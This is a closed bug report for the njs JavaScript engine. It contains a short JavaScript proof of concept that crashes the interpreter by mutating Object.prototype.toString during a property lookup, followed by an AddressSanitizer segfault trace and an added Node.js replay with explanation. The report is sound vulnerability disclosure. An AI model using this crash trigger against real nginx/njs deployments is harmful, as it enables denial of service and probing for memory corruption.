
SEGV njs_lvlhsh.c:231:17 in njs_lvlhsh_bucket_find #467

Closed
@Q1IQ

Description

Environment

OS      : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit  : 7bd570b39297d3d91902c93a624c89b08be7a6fe
Version : 0.7.2
Build   : 
          NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
          NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"

Proof of concept

function f2(v) {
    Object.prototype.toString = v;
}

Object.prototype.toString = f2;

function f() {
    "includes"[{}]();
}

new Promise(f);
String.fromCharCode(0,parseInt);

Stack dump

AddressSanitizer:DEADLYSIGNAL
=================================================================
==2064577==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004cac48 bp 0x7ffcc1edfbf0 sp 0x7ffcc1edfbb0 T0)
==2064577==The signal is caused by a READ memory access.
==2064577==Hint: this fault was caused by a dereference of a high value address (see register values below).  Dissassemble the provided pc to learn which register was used.
    #0 0x4cac48 in njs_lvlhsh_bucket_find /home/q1iq/Documents/origin/njs/src/njs_lvlhsh.c:231:17
    #1 0x4cac48 in njs_lvlhsh_find /home/q1iq/Documents/origin/njs/src/njs_lvlhsh.c:181:20
    #2 0x516c4f in njs_object_property /home/q1iq/Documents/origin/njs/src/njs_object_prop.c:59:15
    #3 0x4d5963 in njs_value_to_primitive /home/q1iq/Documents/origin/njs/src/njs_value.c:159:19
    #4 0x4fb3ab in njs_value_to_number /home/q1iq/Documents/origin/njs/src/njs_value_conversion.h:18:15
    #5 0x4fb3ab in njs_value_to_numeric /home/q1iq/Documents/origin/njs/src/njs_value_conversion.h:54:11
    #6 0x4fb3ab in njs_string_from_char_code /home/q1iq/Documents/origin/njs/src/njs_string.c:2036:19
    #7 0x53bf9c in njs_function_native_call /home/q1iq/Documents/origin/njs/src/njs_function.c:739:11
    #8 0x4e47fa in njs_vmcode_interpreter /home/q1iq/Documents/origin/njs/src/njs_vmcode.c:785:23
    #9 0x53b43a in njs_function_lambda_call /home/q1iq/Documents/origin/njs/src/njs_function.c:703:11
    #10 0x4e47fa in njs_vmcode_interpreter /home/q1iq/Documents/origin/njs/src/njs_vmcode.c:785:23
    #11 0x4deb7b in njs_vm_start /home/q1iq/Documents/origin/njs/src/njs_vm.c:493:11
    #12 0x4c8099 in njs_process_script /home/q1iq/Documents/origin/njs/src/njs_shell.c:903:19
    #13 0x4c7484 in njs_process_file /home/q1iq/Documents/origin/njs/src/njs_shell.c:632:11
    #14 0x4c7484 in main /home/q1iq/Documents/origin/njs/src/njs_shell.c:316:15
    #15 0x7f4beb9e10b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #16 0x41dabd in _start (/home/q1iq/Documents/origin/njs/build/njs+0x41dabd)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/q1iq/Documents/origin/njs/src/njs_lvlhsh.c:231:17 in njs_lvlhsh_bucket_find
==2064577==ABORTING

Credit

Q1IQ(@Q1IQ)
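The script in the report is the reporter's crash trigger for njs. As an added illustration, not part of the issue and not njs code, the following replays the same sequence under standard ECMAScript semantics in Node.js, where it does not crash, and records what each step does. It makes visible the two ToPrimitive conversions that the stack dump above passes through (njs_value_to_primitive calling njs_object_property): the object-valued property key in `"includes"[{}]`, which calls the inherited `Object.prototype.toString` (the PoC's `f2`) with no arguments so that `f2` replaces `Object.prototype.toString` with `undefined` mid-conversion, and the `ToNumber(parseInt)` inside `String.fromCharCode`, which is the frame where njs faults. The example uses a `try`/`catch` in place of the PoC's Promise executor (which only turns the resulting TypeError into a rejection) and restores `Object.prototype.toString` afterwards; it does not claim to reproduce the root cause of the njs fault, which the issue does not state.

```javascript
// Added example, not from the issue or the njs code base: replays the reporter's
// PoC step by step in a standards-conforming engine (Node.js) and records what
// each step does. Object.prototype.toString is restored afterwards so the
// process stays usable.
function tracePoc() {
  const log = [];
  const savedToString = Object.prototype.toString;
  try {
    // Same shape as the PoC's f2: on its first call the overridden toString
    // replaces itself with its argument. ToPrimitive invokes toString with no
    // arguments, so v is undefined and Object.prototype.toString becomes undefined.
    const f2 = function f2(v) {
      log.push(`toString called with v=${String(v)}`);
      Object.prototype.toString = v;
    };
    Object.prototype.toString = f2;

    // "includes"[{}]: the object key goes through ToPropertyKey -> ToPrimitive,
    // which calls the inherited toString (f2). f2 returns undefined, so the key
    // is "undefined"; "includes"["undefined"] is undefined and calling it throws.
    // The PoC runs this inside a Promise executor, which converts the TypeError
    // into a rejection; here it is caught directly instead.
    let thrown = null;
    try {
      "includes"[{}]();
    } catch (e) {
      thrown = e;
    }
    log.push(`call threw ${thrown ? thrown.constructor.name : "nothing"}`);
    log.push(`toString after first use: ${String(Object.prototype.toString)}`);

    // String.fromCharCode(0, parseInt): ToNumber(parseInt) performs ToPrimitive
    // with hint "number" on a function object. Object.prototype.valueOf returns
    // the object itself, so the engine falls through to Function.prototype.toString;
    // the function's source text is NaN as a number, which ToUint16 maps to 0.
    const s = String.fromCharCode(0, parseInt);
    const codes = Array.from(s, (c) => c.charCodeAt(0)).join(",");
    log.push(`fromCharCode length=${s.length} codes=${codes}`);
  } finally {
    Object.prototype.toString = savedToString;
  }
  return log;
}

// Stand-alone usage: print the recorded trace.
console.log(tracePoc().join("\n"));
```

Under spec semantics the first conversion yields the key "undefined" and a TypeError, and the second yields the two-character string "\u0000\u0000"; the interesting part for the njs report is that a prototype method mutates the shared prototype while a lookup on that prototype is in progress, which is exactly the state the njs_object_property frames in the dump are walking through.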
